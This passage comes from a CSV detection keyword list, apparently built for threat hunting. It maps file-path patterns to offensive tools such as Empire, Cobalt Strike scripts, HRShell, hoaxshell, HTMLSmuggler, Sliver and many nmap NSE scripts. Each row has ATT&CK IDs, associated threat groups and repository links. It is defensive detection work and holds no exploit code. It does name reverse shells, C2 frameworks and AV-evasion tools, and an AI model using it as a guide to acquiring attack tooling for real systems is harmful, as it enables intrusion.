the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1098","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*/horizon3ai/*","offensive_tool_keyword","vRealizeLogInsightRCE","POC for VMSA-2023-0001 affecting VMware vRealize Log Insight which includes the following CVEs: VMware vRealize Log Insight Directory Traversal Vulnerability (CVE-2022-31706) VMware vRealize Log Insight broken access control Vulnerability (CVE-2022-31704) VMware vRealize Log Insight contains an Information Disclosure Vulnerability (CVE-2022-31711)","T1190 - T1071 - T1003 - T1069 - T1110 - T1222","TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0007","N/A","N/A","Exploitation Tools","https://github.com/horizon3ai/vRealizeLogInsightRCE","1","1","Added to cover the POC 
exploitation used in massive ransomware campagne that exploit public facing Vmware ESXI product ","N/A","2","147","24","2023-01-31T11:41:08Z","2023-01-30T22:01:08Z" +"*/hostenum.py*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Aggressor script function and alias to perform some rudimentary Windows host enumeration with Beacon built-in commands","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/red-team-scripts","1","1","N/A","10","10","1089","197","2019-11-18T05:30:18Z","2017-05-01T13:53:05Z" +"*/hostmap-bfk.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hostmap-crtsh.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/hostmap-robtex.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/HouQing/*/Loader.go","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","59","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" 
+"*/HRShell.git*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/HRShell/*","offensive_tool_keyword","HRShell","HRShell is an HTTPS/HTTP reverse shell built with flask. It is an advanced C2 server with many features & capabilities.","T1021.002 - T1105 - T1059.001 - T1059.003 - T1064","TA0008 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/chrispetrou/HRShell","1","1","N/A","10","10","244","73","2021-09-09T08:26:32Z","2019-08-20T15:24:46Z" +"*/hta_attack/*","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","10","1617","584","2023-10-03T22:06:35Z","2016-11-16T10:40:04Z" +"*/HTMLSmuggler.git*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*/HTMLSmuggler/*","offensive_tool_keyword","HTMLSmuggler","HTML Smuggling generator&obfuscator for your Red Team operations","T1564.001 - T1027 - T1566","TA0005","N/A","N/A","Phishing - Defense Evasion","https://github.com/D00Movenok/HTMLSmuggler","1","1","N/A","10","1","97","13","2023-09-13T22:26:51Z","2023-07-02T08:10:59Z" +"*/htshells.git*","offensive_tool_keyword","htshells","Self contained htaccess shells and attacks","T1059 - T1059.007 - T1027 - T1027.001 - T1070.004","TA0005 - TA0011 - TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/wireghoul/htshells","1","1","N/A","10","10","945","196","2022-02-17T00:26:23Z","2011-05-16T02:21:59Z" +"*/http_payload.ps1*","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1203 - T1133 - T1190","TA0001 - TA0002 - TA0006","N/A","N/A","Exploitation tools","https://github.com/t3l3machus/hoaxshell","1","1","N/A","N/A","10","2655","443","2023-06-18T13:26:32Z","2022-07-10T15:36:24Z" +"*/http-adobe-coldfusion-apsa1301.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-affiliate-id.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-apache-negotiation.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-apache-server-status.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-aspnet-debug.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/httpattack.py*","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","5","493","68","2023-04-28T00:28:37Z","2021-07-27T19:06:09Z" +"*/http-auth.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-auth-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-avaya-ipoffice-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-awstatstotals-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-axis2-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-backup-finder.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-barracuda-dir-traversal.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-bigip-cookie.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/http-c2.go*","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/http-cakephp-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-chrono.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-cisco-anyconnect.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-coldfusion-subzero.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-comments-displayer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-config-backup.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-cookie-flags.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-cors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-cross-domain-policy.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-csrf.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-date.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-default-accounts.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-devframework.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-dlink-backdoor.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-dombased-xss.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-domino-enum-passwords.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-drupal-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-drupal-enum-users.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-errors.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-exif-spider.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-favicon.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-feed.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-fetch.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-fileupload-exploiter.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-form-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-form-fuzzer.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-frontpage-login.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-generator.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-git.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-gitweb-projects-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/http-google-malware.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
